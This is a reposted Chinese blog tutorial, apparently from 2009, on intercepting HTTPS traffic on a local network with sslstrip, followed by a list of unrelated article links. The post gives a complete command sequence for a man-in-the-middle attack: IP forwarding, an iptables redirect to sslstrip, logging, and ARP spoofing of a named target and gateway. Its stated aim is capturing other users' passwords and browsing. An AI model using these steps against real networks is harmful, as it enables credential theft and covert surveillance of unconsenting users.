博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
运用sslstrip进行中间人攻击(Bypass https)
阅读量:2434 次
发布时间:2019-05-10

本文共 833 字,大约阅读时间需要 2 分钟。

运用sslstrip进行中间人攻击(Bypass https)

文章作者:kevin2600

邪八新人第一帖! 这是我以前在anywlan发过的一帖子, 现转到这来测试下! 要是发错地方请指正.

大家都知在内网进行中间人攻击可以使得攻击者更有效地截获内网用户的密码及隐秘信息。在BackTrack环境下使用EtterCap or ArpSpoof工具即可. 但Ettercap支持的协议中, 仅对HTTP、FTP、Telnet、SMTP等以明文传输的协议有效. 对HTTPS这样用了OpenSSL的就没办法了..... 直到刚在US举行的black hat 2009会上,一老黑发布的名为sslstrip的software,变像的解决了此问题.

此软件可在()找到. E文ok的朋友还可以看他在Black hat上的精彩演讲. 因sslstrip是用python写成,不用安装也可运行.

用法分为以下几步:

1) 用命令 echo "1" > /proc/sys/net/ipv4/ip_forward 将你的机子进入forwarding mode.

2) 用命令 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 使iptables把所有http数据导入sslstrip.

3) 运行 sslstrip -a -w ssllog (写入文本)

4) 运行 arpspoof -i eth0 -t 192.168.1.15 (目标) 192.168.1.1 (网关)

接下来就耐心等待吧! ;) 要提下的是生成的log文件如ssllog其实是html格式的.用konquer可以打开,这样连目标在看的网页面也一清二楚了. 以上均在自个的LAN和BT3下测试完成. 此文是小弟头一回发贴,有不对之处还请大狭们都指正!

Kevin2600

下载:

转载地址:http://dqmmb.baihongyu.com/

你可能感兴趣的文章
mysql唯一索引的一个小常识--Duplicate entry 'XXX' for key 'XXX'
查看>>
故障处理--mongos count不准
查看>>
大量短连接导致haproxy服务器端口耗尽
查看>>
mongo3.0.9库命名的一个S级bug
查看>>
跨版本导入数据导致mysqld崩溃
查看>>
xtrabackup对于flush tables with read lock操作的设置
查看>>
Gone away故障原因排查
查看>>
Server has authorization schema version 3,but found a schema version 1 user
查看>>
WebSphere的池设置——线程池、连接池
查看>>
caffe-ssd调试问题总结
查看>>
用户态调测工具(二):perror和man
查看>>
机器学习&深度学习入门历程
查看>>
LTP(Linux Test Project)学习(一)——LTP介绍
查看>>
LTP(Linux Test Project)学习(二)——LTP下载编译执行
查看>>
LTP(Linux Test Project)学习(三)——LTP目录介绍
查看>>
DirtyCow CVE-2016-5195分析
查看>>
caffe编译报错解决记录
查看>>
LTP(Linux Test Project)学习(七)——LTP提交补丁
查看>>
Linux 4.0亮点特性
查看>>
LTP(Linux Test Project)学习(六)—— 问题分析:chattr命令的限制
查看>>